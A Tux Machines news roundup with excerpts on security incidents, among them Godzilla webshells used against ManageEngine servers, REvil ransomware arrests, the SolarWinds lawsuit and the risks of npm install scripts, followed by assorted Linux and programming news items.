Language Selection

English French German Italian Portuguese Spanish

Proprietary Software and Security Issues

Filed under
Microsoft
Security
  • Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers Godzilla Webshells, NGLite Trojan and KdcSponge Stealer [iophk: Windows TCO]

    Both Godzilla and NGLite were developed with Chinese instructions and are publicly available for download on GitHub. We believe threat actors deployed these tools in combination as a form of redundancy to maintain access to high-interest networks. Godzilla is a functionality-rich webshell that parses inbound HTTP POST requests, decrypts the data with a secret key, executes decrypted content to carry out additional functionality and returns the result via a HTTP response. This allows attackers to keep code likely to be flagged as malicious off the target system until they are ready to dynamically execute it.

  • [Crackers] breach nine global organizations in ongoing espionage campaign [iophk: Windows TCO]

    A [cracking] group with potential ties to China has breached nine global organizations as part of an ongoing espionage effort mostly targeting the defense sector, findings made public Sunday revealed.

    According to a report from cybersecurity company Palo Alto Networks, the [crackers] targeted at least 370 organizations running potentially vulnerable Zoho servers in the U.S. alone, successfully compromising at least one, as part of a wider global campaign.

  • International coalition arrests [crackers] linked to thousands of ransomware attacks [iophk: Windows TCO]

    Europol on Monday announced the arrests, which took place Thursday, saying that the two individuals arrested are alleged to be behind more than 5,000 cyberattacks and are accused of having gained more than half a million Euros in ransomware payments made by victims.

    The arrests were the latest in a string of operations pursued by a coalition of international partners against REvil, with Europol saying Monday that three other individuals associated with REvil, along with two others associated with a linked cyber crime group, have been arrested since February.

  • REvil Ransom Arrest, $6M Seizure, and $10M Reward

    The U.S. Department of Justice today announced the arrest of Ukrainian man accused of deploying ransomware on behalf of the REvil ransomware gang, a Russian-speaking cybercriminal collective that has extorted hundreds of millions from victim organizations. The DOJ also said it had seized $6.1 million in cryptocurrency sent to another REvil affiliate, and that the U.S. Department of State is now offering up to $10 million for the name or location any key REvil leaders, and up to $5 million for information on REvil affiliates.

  • DOJ charges 2 men allegedly behind REvil ransomware attacks [iophk: Windows TCO]

    Yaroslav Vasinskyi, a Ukrainian national arrested last month in Poland, and Yevgeniy Polyanin, a Russian national who remains at large, face charges of fraud, conspiracy and money laundering. Vasinskyi was charged in connection with his alleged role in carrying out the devastating July 4 ransomware attack against the software firm Kaseya, which in turn affected hundreds of companies within the U.S.

  • 77% Indian organisations faced downtime due to cyber risk during festive season [iophk: Windows TCO]

    New Delhi, During peak festive season in the last 18 months 77 per cent of organisations in India experienced downtime due to cybersecurity risk, while 81 per cent of global organisations experienced increased cyber threats during Covid-19, a new report revealed on Tuesday.

    According to McAfee Enterprise and FireEye's report titled 'Cybercrime in a Pandemic World: The Impact of Covid-19', the top three most threatening cyber risks that were detected are malware attacks (47 per cent), data breaches (43 per cent), ransomware and cloud jacking (33 per cent each), over 30 per cent of the IT professionals also experienced vulnerabilities in their 'Internet of Things' devices.

  • SolarWinds investors sue company over supply chain attacks [iophk: Windows TCO]

    The attacks came to light in December 2020 when American cyber security firm FireEye announced that it had identified a global campaign to compromise public and private sector bodies through corruption of software supply chains.

    FireEye is now known as Mandiant, taking on the name of a company that it acquired some years ago after selling its network, email and cloud security products, as well as the FireEye name, in June this year.

  • McAfee Corp to be taken private in $14-billion deal

    The investor group will acquire all outstanding shares of McAfee common stock for $26 per share in an all-cash deal that values McAfee at about $12 billion on an equity basis.

  • npm install is curl | bash

    npm (and yarn) will execute arbitrary code when you install a package via install scripts. A valid use-case is to build native code on installation, or do some other environment-specific setup, though these scripts have also been used to show ads and, of course, as an attack vector. In fact, install scripts were the most popular route for malware as of 20192.

    Installing a single malicious package is enough to get reasonably pwned. The risk is mitigated by npm’s moderation of the registry — they’re quick to remove malware once discovered. This works pretty well, though I worry about the day someone uses this to publish a self-replicating worm.

    This attack vector isn’t unique to npm. Other package managers like pip and RubyGems allow for the same thing. As developers, we’re not as cautious when installing packages from these registries as when we use curl | bash, though we should be3.

  • New DDoS attack vectors may spell trouble in future: Kaspersky

    Researchers at the Universities of Maryland and Colorado Boulder were credited with the TCP development, while the second was credited to security firm NexusGuard and named Black Storm.

    The TCP attack targets devices between a client and a server: firewalls, load balancers, network address translators, and deep packet inspection tools, many of which could interfere with a TCP connection.

More in Tux Machines

Ubuntu 21.04 (Hirsute Hippo) Reached End of Life, Upgrade to Ubuntu 21.10 Now

Dubbed by Canonical as the “Hirsute Hippo,” Ubuntu 21.04 was released nine months ago, on April 22nd, 2021. It was the first Ubuntu release to use the next-generation Wayland display server by default for its Ubuntu Desktop flavor, which uses a modified version of the GNOME desktop environment. Ubuntu 21.04 didn’t make the plunge into the GNOME 40 desktop environment series due to its redesigned Activities Overview, but it did ship with support for GNOME 40 apps while being built on top of the older GNOME 3.38 desktop environment series. Read more

today's leftovers

  • Supplino is a variable benchtop power supply that you can build yourself | Arduino Blog

    Working with electronics requires access to stable power in a variety of voltages. Some components require 3.3V and others require 5V. Still others need 9V or 12V — there are many possibilities. You could keep a variety of wall warts on hand, but a variable benchtop power supply is a more convenient option. Supplino is one choice and this guide from Giovanni Bernardo and Paolo Loberto will walk you through how to build one. Supplino can accept anything from 4 to 40 volts and can output anything from 1.25 to 36 volts, with a maximum of 5A. An XH-M401 module with an XL4016E1 DC-DC buck converter handles the voltage regulation. Technically, you could use that alone to power your components. But the addition of an Arduino Nano board (or Nano Every) makes the experience far friendlier. It monitors the power supply output and drives a 1.8″ 128×160 TFT LCD screen, which displays the present voltage, amperage, and wattage.

  • Relocating Fedora's RPM database [LWN.net]

    The deadlines for various kinds of Fedora 36 change proposals have mostly passed at this point, which led to something of a flurry of postings to the distribution's devel mailing list over the last month. One of those, for a seemingly fairly innocuous relocation of the RPM database from /var to /usr, came in right at the buzzer for system-wide changes on December 29. There were, of course, other things going on around that time, holidays, vacations, and so forth, so the discussion was relatively muted until recently. Proponents have a number of reasons why they would like to see the move, but there is resistance, as well, that is due, at least in part, to the longstanding "tradition" of the location for the database.

  • CPU Isolation – A practical example – by SUSE Labs (part 5)
  • How to install Mantis bug tracker on Debian 11?

    Hello friends. In this post, you will learn how to install Mantis Bug Tracker on Debian 11.

Server: MongoDB vs. DynamoDB, Mirantis, and More

  • MongoDB vs. DynamoDB: What you need to know

    NoSQL databases have become more popular because of the need for more flexible backend solutions. These databases run applications that require a more flexible data structure than traditional structured databases can provide. Robust feature-rich NoSQL database platforms famous for NoSQL databases include MongoDB and DynamoDB. This article guide will compare these two databases to help you choose the right one for your project.

  • Mirantis brings secure registries to Kubernetes distros | ZDNet

    Mirantis Secure Registry, formerly Docker Trusted Registry, provides an enterprise-grade container registry solution. You can use this as a foundation to build a secure software supply chain. It does this by providing you with access to a container image registry that has enhanced levels of security beyond that of public registries. This, in turn, gives you more control over this critical part of their software supply chain. The comprehensive, built-in security enables users to verify and trust the automated operations and integration with Continuous Integration/Continuous Delivery (CI/CD) pipelines to speed up application testing and delivery. You can use MSR alongside your other apps in any standard Kubernetes 1.20 and above distribution, via standard Helm techniques. While the new MSR is no longer integrated with Mirantis Kubernetes Engine (MKE) as it was earlier, it still runs as well as ever on MKE as it does with any other supported Kubernetes distribution.

  • How North Dakota Is More Like Windows than UNIX

    If your official name is YATES, you can't (and presumably needn't) file a petition to change it to Yates. "Petitioners have offered no authority or reasoned argument that there is any legal significance to the capitalization of their names."

  • The Success of ‘Open-hearted’ Partnerships in the Cloud | SUSE Communities

    The future is open — and it’s better together. At SUSE, we pride ourselves on our partnerships, and sometimes what we can achieve together surpasses even our greatest hopes. That’s what our award-winning, cloud-based, high-performance computing (HPC) partnership with UberCloud, Dassault Systèmes, and Google Cloud achieved, by enabling 3DT Holdings researchers to create an affordable, real-time heart surgery simulator for physicians to use when it matters most. This is an ongoing relationship with the Living Heart Project that we think is just the beginning of what this ground-breaking research can achieve — and the lives it can save.

Programming Leftovers

  • An outdated Python for openSUSE Leap [LWN.net]

    Enterprise distributions are famous for maintaining the same versions of software throughout their, normally five-year-plus, support windows. But many of the projects those distributions are based on have far shorter support periods; part of what the enterprise distributions sell is patching over those mismatches. But openSUSE Leap is not exactly an enterprise distribution, so some users are chafing under the restrictions that come from Leap being based on SUSE Enterprise Linux (SLE). In particular, shipping Python 3.6, which reached its end of life at the end of 2021, is seen as problematic for the upcoming Leap 15.4 release. [...] OpenSUSE and SLE have generally been aligned over the years. In 2020, Leap and SLE grew even closer together. The build system and repositories between the two were shared starting with Leap 15.2, which corresponded to the second "service pack" (SP) of SLE (i.e. SLE 15-SP2). In 2021, with Leap 15.3 and SLE 15-SP3, the two distributions effectively merged, such that all of the base packages were shared between the two. To a first approximation, Leap is an openSUSE-branded version of SLE, much like what CentOS used to be for Red Hat Enterprise Linux.

  • Make Your Python CLI Tools Pop With Rich | Hackaday

    It seems as though more and more of the simple command-line tools and small scripts that used to be bash or small c programs are slowly turning into python programs. Of course, we will just have to wait and see if this ultimately turns out to be a good idea. But in the meantime, next time you’re revamping or writing a new tool, why not spice it up with Rich?

  • An outdated Python for openSUSE Leap [LWN.net]

    Enterprise distributions are famous for maintaining the same versions of software throughout their, normally five-year-plus, support windows. But many of the projects those distributions are based on have far shorter support periods; part of what the enterprise distributions sell is patching over those mismatches. But openSUSE Leap is not exactly an enterprise distribution, so some users are chafing under the restrictions that come from Leap being based on SUSE Enterprise Linux (SLE). In particular, shipping Python 3.6, which reached its end of life at the end of 2021, is seen as problematic for the upcoming Leap 15.4 release. [...] OpenSUSE and SLE have generally been aligned over the years. In 2020, Leap and SLE grew even closer together. The build system and repositories between the two were shared starting with Leap 15.2, which corresponded to the second "service pack" (SP) of SLE (i.e. SLE 15-SP2). In 2021, with Leap 15.3 and SLE 15-SP3, the two distributions effectively merged, such that all of the base packages were shared between the two. To a first approximation, Leap is an openSUSE-branded version of SLE, much like what CentOS used to be for Red Hat Enterprise Linux.

  • Make Your Python CLI Tools Pop With Rich | Hackaday

    It seems as though more and more of the simple command-line tools and small scripts that used to be bash or small c programs are slowly turning into python programs. Of course, we will just have to wait and see if this ultimately turns out to be a good idea. But in the meantime, next time you’re revamping or writing a new tool, why not spice it up with Rich?